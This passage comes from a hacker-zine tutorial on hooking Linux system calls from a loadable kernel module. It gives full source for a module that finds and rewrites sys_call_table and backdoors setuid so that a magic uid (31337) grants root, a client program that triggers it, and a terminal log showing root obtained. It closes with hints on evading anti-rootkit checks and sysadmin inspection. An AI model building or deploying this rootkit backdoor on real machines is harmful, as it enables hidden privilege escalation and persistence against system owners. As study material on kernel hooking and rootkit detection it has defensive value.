    As I said in section 0x02, sys_call_table is read-only. The same
    holds for other parts of kernel memory. The solution is to create a
    second, writable mapping of the same physical pages with vmap().

    void *vmap(struct page **pages, unsigned int count,
                                unsigned long flags, pgprot_t prot);

    As we can see, vmap() takes 4 arguments. The 1st is an array of
    pointers to 'struct page', the 2nd is the number of pages, the 3rd
    holds flags and the 4th describes the memory protection.

    Virtual memory is divided into pages of 4096 bytes each (we can get
    that with PAGE_SIZE). If an address is at the beginning of a page,
    its lowest 12 bits (bits 0..11) are zero. If it is not, we can get
    the address of the beginning of its page with a bitwise AND with
    PAGE_MASK. To get the 'struct page' that describes the page of a
    virtual address we use the virt_to_page() macro. Two virtual
    addresses belong to the same page only if they differ in nothing but
    bits 0..11.
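
    The page arithmetic can be checked in userland. The macros below are
    stand-ins for 4096-byte pages, prefixed with TOY_ to make clear that
    they are not the kernel's own definitions:

```c
#include <stdint.h>

/* Userland copies of the kernel macros, assuming 4096-byte pages. */
#define TOY_PAGE_SHIFT 12
#define TOY_PAGE_SIZE  ((uintptr_t)1 << TOY_PAGE_SHIFT)
#define TOY_PAGE_MASK  (~(TOY_PAGE_SIZE - 1))

/* Start of the page that contains addr (clears bits 0..11). */
uintptr_t toy_page_base(uintptr_t addr)      { return addr & TOY_PAGE_MASK; }

/* Position of addr inside its page (keeps only bits 0..11). */
uintptr_t toy_offset_in_page(uintptr_t addr) { return addr & ~TOY_PAGE_MASK; }

/* Two addresses share a page when everything above bit 11 is equal. */
int toy_same_page(uintptr_t a, uintptr_t b) {
    return toy_page_base(a) == toy_page_base(b);
}
```

    For the address 0xc1582160 the page starts at 0xc1582000 and the
    offset inside the page is 0x160.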

    According to [6] virt_to_page() was broken on the x86-64 architecture
    and it was fixed in version 2.6.22. On older kernels we need to use
    "pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" instead (addr is the
    variable with our address). To choose between the two we need some
    preprocessor checks: if __i386__ is defined the module is being
    compiled for x86-32, and if __x86_64__ is defined it is being
    compiled for x86-64. LINUX_VERSION_CODE contains the numeric value of
    the kernel version, and with the KERNEL_VERSION() macro we can get
    the value of any version we want, so we need to include
    linux/version.h.

    To call vmap() we have to include linux/vmalloc.h and linux/mm.h. The
    1st argument we pass consists of 2 pages, because sys_call_table may
    cross a page boundary and continue in the next page. The 3rd argument
    is the flag VM_MAP, which tells vmap() that we gave it an array of
    pages to map. Finally, the 4th argument is PAGE_KERNEL, which makes
    the new mapping readable and writable.

    vmap() returns the address at which the 1st page we asked for is now
    mapped, so to access sys_call_table we need to add its offset within
    the page. We can get this offset with the offset_in_page() macro. In
    the cleanup function we have to call vunmap() to unmap the pages.
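
    Why 2 pages are enough can be checked with a little arithmetic. The
    sketch below runs in userland; toy_pages_spanned is a name made up
    here and the table size is taken from the "cmp $0x152,%eax" we saw in
    the x86-32 disassembly (0x152 entries of 4 bytes each):

```c
#include <stddef.h>
#include <stdint.h>

#define TOY_PAGE_SIZE ((uintptr_t)4096)   /* assumed page size */

/* Number of pages touched by 'len' bytes starting at 'addr' (len > 0). */
size_t toy_pages_spanned(uintptr_t addr, size_t len) {
    uintptr_t first = addr / TOY_PAGE_SIZE;
    uintptr_t last  = (addr + len - 1) / TOY_PAGE_SIZE;
    return (size_t)(last - first + 1);
}
```

    A table of 0x152 * 4 = 1352 bytes at 0xc1582160 fits in 1 page, but
    the same table at an address ending in 0xf00 would cross into the
    next page. Since the table is smaller than a page it can never touch
    more than 2, so mapping 2 pages covers both cases.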


    --function: get_writable_sct()--
    void *get_writable_sct(void *sct_addr) {
        struct page *p[2];
        void *sct;
        unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

        if (sct_addr == NULL)
            return NULL;

    #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
        p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
        p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
    #else
        p[0] = virt_to_page(addr);
        p[1] = virt_to_page(addr + PAGE_SIZE);
    #endif
        sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
        if (sct == NULL)
            return NULL;
        return sct + offset_in_page(sct_addr);
    }
    -- END OF FUNCTION --
    
    -- EXAMPLE --
    void **sys_call_table = get_writable_sct(get_sys_call_table());
    // hook some system calls
    vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
    -- END OF EXAMPLE --


--[ 0x0A Hook a system call

    To hook a system call, we first store its real address and then
    replace it with the address of the function we created. The
    prototypes of the system call functions are found in
    "include/linux/syscalls.h" [5]. As an example take a look at the
    prototype of setuid:


    asmlinkage long sys_setuid(uid_t uid);


    asmlinkage is a macro which tells gcc that the arguments are passed
    on the stack and not in registers, whatever the optimization
    settings (this matters on x86-32; on x86-64 it does not change how
    arguments are passed). In our module we define the following:


    asmlinkage long (*real_setuid)(uid_t uid);


    real_setuid is a pointer to a function. After that we create our own
    function, which will call real_setuid().


    asmlinkage long hooked_setuid(uid_t uid) {
        return real_setuid(uid);
    }


    If we include asm/unistd_32.h we get the system call numbers for
    x86-32, and if we include asm/unistd_64.h we get the numbers for
    x86-64. In older glibc versions these files were asm-i386/unistd.h
    and asm-x86_64/unistd.h. If we include asm/unistd.h, the preprocessor
    picks the right one. In these files the system call numbers have the
    __NR_ prefix, so __NR_setuid is the number of setuid. To hook setuid
    we write the following:


    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;


    and in the cleanup function, to unhook it, we write:


    sys_call_table[__NR_setuid] = real_setuid;


    If we want the module to work on both x86 architectures, we have to
    use preprocessor conditionals. If CONFIG_IA32_EMULATION is defined,
    x86-32 system calls also work on the x86-64 system. sys_call_table
    and ia32_sys_call_table contain pointers to many of the same
    handlers, but at different indexes. There is a small problem:
    asm/unistd_32.h and asm/unistd_64.h use the same names for their
    values, so we can't include both at the same time. A simple solution
    is a small script which detects whether the architecture is x86-64,
    copies asm/unistd_32.h (or asm-i386/unistd.h) into the folder of our
    source code and replaces the prefix __NR_ with __NR32_.


--file: configure.sh--
#!/bin/sh

if [ "`uname -m`" = x86_64 ]; then
    if [ -e /usr/include/asm/unistd_32.h ]; then
        sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h
    elif [ -e /usr/include/asm-i386/unistd.h ]; then
        sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h
    else
        # report the failure on stderr and stop, so the build does not go on
        echo "asm/unistd_32.h and asm-i386/unistd.h do not exist." >&2
        exit 1
    fi
fi
--EOF--


    Here we should include this:


    #ifdef CONFIG_IA32_EMULATION
    #include "unistd_32.h"
    #endif


    with this we hook the 32-bit entry:


    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif


    and with this we unhook it:

  
    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif
  

    Notice: Sometimes, when the implementation of a system call is
    changed completely because the previous one was deprecated, the old
    number is kept and a new one is added. Indeed, since some kernel
    version, on x86-32 setuid exists twice, as sys_setuid16 and
    sys_setuid. sys_setuid16 has the number __NR_setuid and sys_setuid
    the number __NR_setuid32. In this case we can hook both if we want,
    using the preprocessor to add the extra code. I am not going to
    implement this, but I will show the case where we only want to hook
    sys_setuid.


    hook:

    #ifdef __NR_setuid32
        real_setuid = sys_call_table[__NR_setuid32];
        sys_call_table[__NR_setuid32] = hooked_setuid;
    #else
        real_setuid = sys_call_table[__NR_setuid];
        sys_call_table[__NR_setuid] = hooked_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif
    #endif


    unhook:
    
    #ifdef __NR_setuid32
        sys_call_table[__NR_setuid32] = real_setuid;
    #else
        sys_call_table[__NR_setuid] = real_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = real_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif
    #endif
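

    The same #ifdef selection can be tried from userland. The following is
    a minimal sketch, assuming a Linux libc whose <sys/syscall.h> exposes
    the __NR_* constants; setuid_syscall_nr is a hypothetical helper name
    used only for illustration and is not part of the module.

```c
#include <assert.h>
#include <sys/syscall.h>   /* pulls in the __NR_* constants for this ABI */

/* Return the number under which the full-width setuid is registered.
 * Where __NR_setuid32 exists (e.g. x86-32), plain __NR_setuid is the
 * legacy 16-bit call, so we prefer the 32-bit one. Elsewhere (e.g.
 * x86-64) only __NR_setuid is defined. */
static long setuid_syscall_nr(void)
{
#ifdef __NR_setuid32
    long nr = __NR_setuid32;
#else
    long nr = __NR_setuid;
#endif
    assert(nr >= 0);       /* syscall numbers are never negative */
    return nr;
}
```

    Calling setuid_syscall_nr() from a small test program and printing the
    result shows which of the two numbers the headers of the build machine
    select.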


    Before I provide you with the whole module's source code, let's make
    an interesting modification to hooked_setuid. A nice idea is this: when
    setuid is called with a "magic" number as its uid parameter, we change
    the uid and gid of the process to 0. In other words, we give the
    process root privileges.

    Inside the kernel there are lots of data structures that may change in
    future versions, either because vulnerabilities are discovered or
    because they get implemented in a better way. One of these is 'struct
    task_struct', where a lot of information about a process can be found.
    This struct contains 8 interesting variables:


    uid_t uid, euid, suid, fsuid;
    gid_t gid, egid, sgid, fsgid;


    To refer to the running process we use the 'current' macro. For both
    'struct task_struct' and 'current' we need to include linux/sched.h.
    To give root privileges to a process we do the following:


    current->uid = current->euid = current->suid = current->fsuid = 0;
    current->gid = current->egid = current->sgid = current->fsgid = 0;
    return 0;
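

    From userland, the four uid and four gid values of a process can be
    observed in /proc/self/status, whose "Uid:" and "Gid:" lines list the
    real, effective, saved and filesystem IDs in that order. The following
    is a minimal sketch, assuming /proc is mounted; read_ids is a
    hypothetical helper name introduced here for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Read the four IDs on the "Uid:" or "Gid:" line of /proc/self/status.
 * The kernel prints them as: real, effective, saved, filesystem.
 * Returns 0 on success, -1 if the line could not be read or parsed. */
static int read_ids(const char *key, unsigned int ids[4])
{
    char line[256];
    FILE *f;
    int found = -1;

    assert(key != NULL && ids != NULL);

    f = fopen("/proc/self/status", "r");
    if (f == NULL)
        return -1;

    while (fgets(line, sizeof(line), f) != NULL) {
        if (strncmp(line, key, strlen(key)) == 0) {
            /* %u skips the tabs that separate the four fields */
            if (sscanf(line + strlen(key), "%u %u %u %u",
                       &ids[0], &ids[1], &ids[2], &ids[3]) == 4)
                found = 0;
            break;
        }
    }

    fclose(f);
    return found;
}
```

    Calling read_ids("Uid:", ids) and read_ids("Gid:", ids) before and
    after a setuid call shows which of the eight values actually changed.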


    This will not work on kernel 2.6.29 and above, because both the data
    structure and the method that assigns a new uid and gid to the process
    have changed. The new method introduces a new struct, 'struct cred'.
    To change the uid and gid we first call prepare_creds(), which returns
    a pointer to a newly created 'struct cred' (or NULL if the allocation
    fails), then we change the variables and call commit_creds(). Finally
    we return the result of commit_creds().


    struct cred *cred = prepare_creds();
    if (cred == NULL)
        return -ENOMEM;
    cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
    cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
    return commit_creds(cred);


    I strongly advise you to use the kernel's git to understand the kernel
    changes.
    (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags)


--file: hook_setuid.c--
#include <linux/module.h>
#include <linux/version.h>
#include <linux/vmalloc.h>
#include <linux/mm.h>
#include <linux/sched.h>
#include <asm/unistd.h>

#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif


#ifdef __i386__
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));
#elif defined(CONFIG_IA32_EMULATION)
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));
#endif

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void **sys_call_table;
#ifdef CONFIG_IA32_EMULATION
void **ia32_sys_call_table;
#endif


asmlinkage long (*real_setuid)(uid_t uid);

asmlinkage long hooked_setuid(uid_t uid) {
    if (uid == 31337) {
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,29)
        struct cred *cred = prepare_creds();
        if (cred == NULL)
            return -ENOMEM;
        cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
        cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
        return commit_creds(cred);
#else
        current->uid = current->euid = current->suid = current->fsuid = 0;
        current->gid = current->egid = current->sgid = current->fsgid = 0;
        return 0;
#endif
    }
    return real_setuid(uid);
}


#if defined(__i386__) || defined(CONFIG_IA32_EMULATION)
#ifdef __i386__
void *get_sys_call_table(void) {
#elif defined(__x86_64__)
void *get_ia32_sys_call_table(void) {
#endif
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

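#ifdef __i386__
    /* cast before shifting so the value is never treated as a signed int */
    system_call = (void*)(((unsigned long)idtd.offset_high<<16) |
                        idtd.offset_low);
#elif defined(__x86_64__)
    system_call = (void*)(((unsigned long)idtd.offset_high<<32) |
                        ((unsigned long)idtd.offset_middle<<16) |
                        idtd.offset_low);
#endif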

    for (ptr=system_call, i=0; i<500; i++) {
#ifdef __i386__
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
#elif defined(__x86_64__)
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
#endif
        ptr++;
    }

    return NULL;
}
#endif


#ifdef __x86_64__
#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    int i;
    unsigned int low, high;  /* unsigned: avoid sign extension of low */

    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((unsigned long)high<<32) | low);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }   

    return NULL;
}
#endif


void *get_writable_sct(void *sct_addr) {
    struct page *p[2];
    void *sct;
    unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

    if (sct_addr == NULL)
        return NULL;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
    p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
    p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
    p[0] = virt_to_page(addr);
    p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
    sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
    if (sct == NULL)
        return NULL;
    return sct + offset_in_page(sct_addr);
}

static int __init hook_init(void) {
    sys_call_table = get_writable_sct(get_sys_call_table());
    if (sys_call_table == NULL)
        return -1;

#ifdef CONFIG_IA32_EMULATION
    ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table());
    if (ia32_sys_call_table == NULL) {
        vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
        return -1;
    }
#endif

    /* hook setuid */
#ifdef __NR_setuid32
    real_setuid = sys_call_table[__NR_setuid32];
    sys_call_table[__NR_setuid32] = hooked_setuid;
#else
    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
    /***************/

    return 0;
}

static void __exit hook_exit(void) {
    /* unhook setuid */
#ifdef __NR_setuid32
    sys_call_table[__NR_setuid32] = real_setuid;
#else
    sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
    /*****************/

    // unmap memory
    vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
#ifdef CONFIG_IA32_EMULATION
    vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK));
#endif
}

module_init(hook_init);
module_exit(hook_exit);
MODULE_LICENSE("GPL");
--EOF--
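

    The byte search used by the x86-64 functions above can be studied in
    userland on an ordinary buffer. The bytes ff 14 c5 encode "call
    *disp32(,%rax,8)", and the four bytes that follow are a 32-bit
    displacement that the CPU sign-extends to 64 bits. The module gets the
    same result by OR-ing with 0xffffffff00000000, which matches sign
    extension whenever bit 31 is set, as it is for kernel addresses. The
    following is a minimal sketch, assuming a little-endian host;
    find_table_addr is a hypothetical helper name and the buffer it scans
    is supplied by the caller, not read from the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scan up to len bytes for ff 14 c5 and return the sign-extended 32-bit
 * displacement that follows the pattern. Returns 0 if it is absent. */
static uint64_t find_table_addr(const unsigned char *code, size_t len)
{
    size_t i;

    assert(code != NULL);

    /* 3 opcode bytes + 4 displacement bytes must fit in the buffer */
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0xc5) {
            int32_t disp;

            memcpy(&disp, code + i + 3, sizeof(disp)); /* unaligned-safe */
            return (uint64_t)(int64_t)disp;            /* sign-extend */
        }
    }
    return 0;
}
```

    Unlike the loop in the module, this version takes the buffer length as
    a parameter, so it never reads past the end of the data it is given.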


--file: get_root.c--
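#include <stdio.h>
#include <unistd.h>

int main(void) {
    /* 31337 is the "magic" uid that hooked_setuid() checks for */
    if (setuid(31337) == -1) {
        perror("setuid");
        return 1;
    }
    execlp("bash", "bash", (char *)NULL);
    perror("execlp");   /* reached only if exec failed */
    return 1;
}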
--EOF--


    oblique@gentoo ~/hooking $ ./configure.sh 
    oblique@gentoo ~/hooking $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hooking/hook_setuid.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hooking/hook_setuid.mod.o
      LD [M]  /home/oblique/hooking/hook_setuid.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko  
    oblique@gentoo ~/hooking $ gcc get_root.c -o get_root
    oblique@gentoo ~/hooking $ ./get_root 
    gentoo hooking # id
    uid=0(root) gid=0(root) groups=0(root)
    gentoo hooking # rmmod hook_setuid
    gentoo hooking # exit
    exit
    oblique@gentoo ~/hooking $ ./get_root 
    setuid: Operation not permitted
    oblique@gentoo ~/hooking $ 

    
--[ 0x0B Other ideas/methods
    
    What we saw is one of the most basic hooking techniques. There are
    many equivalent ones: for example, to avoid editing the
    sys_call_table, we can allocate a buffer in kernel memory and copy the
    sys_call_table there. Then we change the addresses in the new array
    and finally we change the table address that system_call uses for its
    call. If we want, we can instead change the entry of interrupt 0x80 in
    the IDT, or the value of the IA32_LSTAR MSR, so that it points to
    another system_call. Another elegant hooking method, independent of
    system calls, is hooking the debugger's trap. This can be implemented
    using interrupt 3 of the IDT.
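

    The copy-and-redirect idea is easier to see on a toy dispatcher in
    userland. The following is a minimal sketch with made-up handlers; all
    names in it (call_a, dispatch, install_shadow and so on) are
    hypothetical and have nothing to do with real kernel symbols. It only
    illustrates that the original array stays byte-for-byte intact while
    the dispatcher starts using the modified copy.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NR_CALLS 3

typedef long (*call_fn)(long);

/* Toy "system calls" */
static long call_a(long x) { return x + 1; }
static long call_b(long x) { return x * 2; }
static long call_c(long x) { return -x; }

/* Replacement for call_b that wraps the original */
static long call_b_hooked(long x) { return call_b(x) + 1000; }

static call_fn original_table[NR_CALLS] = { call_a, call_b, call_c };
static call_fn shadow_table[NR_CALLS];

/* The table the dispatcher currently uses */
static call_fn *active_table = original_table;

static long dispatch(size_t nr, long arg)
{
    assert(nr < NR_CALLS);
    return active_table[nr](arg);
}

/* Copy the table, patch the copy, then point the dispatcher at it */
static void install_shadow(void)
{
    memcpy(shadow_table, original_table, sizeof(original_table));
    shadow_table[1] = call_b_hooked;
    active_table = shadow_table;
}
```

    After install_shadow(), dispatch(1, x) goes through call_b_hooked,
    while original_table still holds call_b, so a check that only reads
    the original array sees nothing unusual.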

    This technique has some limitations. It cannot be applied to systems
    that have LKM support disabled. Modules *must* be compiled for the
    same kernel they are going to be loaded into, which means that after a
    kernel update the module needs to be recompiled. Some userland-based
    techniques get around these issues by changing kernel memory through
    /dev/mem or /dev/kmem, but in that case other forms of protection have
    to be dealt with.

    Notice: Anti-rootkits usually check the sys_call_table, so the method
    shown here is easily detected and should not be relied on. A possible
    workaround is to change the sys_call_table address inside system_call,
    or to implement our own system_call. Moreover, with lsmod or through
    /proc/kallsyms a sysadmin should be able to notice that something is
    wrong... but hooking can solve these issues as well.
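

    The kind of check such a tool performs can be sketched in userland as
    a comparison of the live table against a trusted snapshot. This is a
    minimal sketch under that assumption, not the method of any particular
    anti-rootkit; first_modified_entry and the toy handlers are
    hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

typedef long (*call_fn)(long);

/* Toy handlers used to fill the example tables */
static long handler_read(long x)  { return x; }
static long handler_write(long x) { return x + 1; }
static long handler_other(long x) { return x - 1; }

/* Return the index of the first entry that differs from the trusted
 * snapshot, or -1 if all n entries match. */
static long first_modified_entry(const call_fn *live,
                                 const call_fn *snapshot, size_t n)
{
    size_t i;

    assert(live != NULL && snapshot != NULL);

    for (i = 0; i < n; i++)
        if (live[i] != snapshot[i])
            return (long)i;
    return -1;
}
```

    A check like this only covers the array it is pointed at, which is why
    the workarounds mentioned above leave the original table untouched.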


    I hope you enjoyed reading the article as much as I enjoyed writing it :)


    Happy hacking,
    oblique.


--[ 0x0C Greets

    Greets to grhack.net community, AthCon staff and p0wnbox.Team. Special
    thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for
    their knowledge and their company. Thanks pytt, angel_scar and
    killer_null for being good friends. Last but not least I want to give
    kudos to my friends from the real world, psychedelic music and FF.C for
    their songs and philosophy.


--[ 0x0D References

    [1] http://phrack.org/issues.html?issue=59&id=4#article
    [2] http://phrack.org/issues.html?issue=58&id=7#article
    [3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29
    [5] Linux Kernel source code (http://kernel.org)
    [6] KSplice source code (http://www.ksplice.com/software)

    Intel 64 and IA-32 Architectures Software Developer's Manual
    (http://www.intel.com/products/processor/manuals/):
    [7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4
    [8] "Volume 3B: System Programming Guide", Appendix B
    [9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2,
        Instructions: RDMSR, WRMSR, SYSCALL

                                                        _______________________________|_._._._._._,
                                                        \                       EOF    |_X_X_X_X_X_|
                                                                                       !